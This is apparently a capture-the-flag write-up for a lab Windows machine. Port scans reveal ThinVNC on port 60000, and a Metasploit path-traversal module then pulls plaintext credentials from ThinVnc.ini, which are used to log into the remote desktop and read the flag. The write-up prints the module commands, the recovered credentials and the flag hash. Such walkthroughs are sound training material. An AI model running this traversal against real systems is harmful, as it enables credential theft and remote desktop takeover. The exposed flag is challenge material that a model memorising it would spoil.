FLAG67

2971f3459fe55db1237aad5e0f0a259a41633962

Enumeration

rustscan -a 10.150.150.69

PORT      STATE SERVICE       REASON
445/tcp   open  microsoft-ds  syn-ack
3389/tcp  open  ms-wbt-server syn-ack
5040/tcp  open  unknown       syn-ack
49664/tcp open  unknown       syn-ack
49665/tcp open  unknown       syn-ack
49666/tcp open  unknown       syn-ack
49667/tcp open  unknown       syn-ack
49668/tcp open  unknown       syn-ack
49669/tcp open  unknown       syn-ack
49670/tcp open  unknown       syn-ack
50417/tcp open  unknown       syn-ack
60000/tcp open  unknown       syn-ack

Weird service is running on port 60000

nmap -sC -sV 10.150.150.69 -p 60000

PORT      STATE SERVICE VERSION
60000/tcp open  unknown
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Content-Type: text/html
|     Content-Length: 177
|     Connection: Keep-Alive
|     <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL nice%20ports%2C/Tri%6Eity.txt%2ebak was not found on this server.<P></BODY></HTML>
|   GetRequest: 
|     HTTP/1.1 401 Access Denied
|     Content-Type: text/html
|     Content-Length: 144
|     Connection: Keep-Alive
|     WWW-Authenticate: Digest realm="**ThinVNC**", qop="auth", nonce="W9BAogLF5UDo3EcCAsXlQA==", opaque="m2yqFi2usv3AY2yatYSTRmyNPAplB8C1oC"
|_    <HTML><HEAD><TITLE>401 Access Denied</TITLE></HEAD><BODY><H1>401 Access Denied</H1>The requested URL requires authorization.<P></BODY></HTML>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at <https://nmap.org/cgi-bin/submit.cgi?new-service> :

Exploitation

Using Metasploit

msfconsole

msf6 > search thinvnc
msf6 > use auxiliary/scanner/http/thinvnc_traversal

msf6 auxiliary(scanner/http/thinvnc_traversal) > set rhosts 10.150.150.69
msf6 auxiliary(scanner/http/thinvnc_traversal) > set rport 60000

msf6 auxiliary(scanner/http/thinvnc_traversal) > run
[+] File ThinVnc.ini saved in: /home/zyaire/.msf4/loot/20220123173218_default_10.150.150.69_thinvnc.traversa_144924.txt
[+] Found credentials: **desperado**:**TooComplicatedToGuessMeAhahahahahahahh**
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Using Burp Suite Burp Suite Repeater

Using LFI knowing thinvnc is having .ini file

Untitled

**desperado**:**TooComplicatedToGuessMeAhahahahahahahh**

Go to http://10.150.150.69:60000/ and enter the credentials

Untitled

Untitled

Getting FLAG67.txt

2971f3459fe55db1237aad5e0f0a259a41633962